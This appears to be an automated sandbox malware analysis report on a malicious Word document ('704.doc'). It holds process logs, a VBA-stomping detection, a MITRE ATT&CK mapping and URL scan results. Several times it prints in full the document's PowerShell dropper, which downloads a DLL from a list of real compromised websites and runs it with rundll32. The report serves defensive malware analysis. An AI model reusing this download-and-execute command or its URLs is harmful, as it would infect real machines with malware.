Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FF00260F3C sldt word ptr [eax]4_2_000007FF00260F3C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Document contains VBA stomped code (only p-code) potentially bypassing AV detectionShow sources
Source: 704.docOLE indicator, VBA stomping: true
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE indicator, VBA stomping: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter111Path InterceptionProcess Injection11Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting32Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting32Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
704.doc100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://huskysb.com/wordpress/6f0qIQ0%Avira URL Cloudsafe
http://huskysb.com/wordpre0%Avira URL Cloudsafe
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PE0%Avira URL Cloudsafe
http://ckfoods.net/wp-admin/wPInm2rgMu/100%Avira URL Cloudmalware
http://primtalent.com/wp-admin/9yt1u/0%Avira URL Cloudsafe
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/0%Avira URL Cloudsafe
http://huskysb.com/wordpress/6f0qIQlWPaYDfa/0%Avira URL Cloudsafe
http://adorwelding.zmo0%Avira URL Cloudsafe
http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/0%Avira URL Cloudsafe
http://server.zmotpro.com/venkat/0%Avira URL Cloudsafe
http://adorwelding.zmotp0%Avira URL Cloudsafe
http://manak.edunetf0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/100%Avira URL Cloudmalware
http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/100%Avira URL Cloudmalware
http://primtalent.com/wp-admin/90%Avira URL Cloudsafe
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/P0%Avira URL Cloudsafe
http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBW0%Avira URL Cloudsafe
http://ckfoods.net/wp-admin/wP0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://huskysb.com/wordpress/6f0qIQpowershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmptrue
  • Avira URL Cloud: safe
unknown
http://huskysb.com/wordprepowershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmptrue
  • Avira URL Cloud: safe
unknown
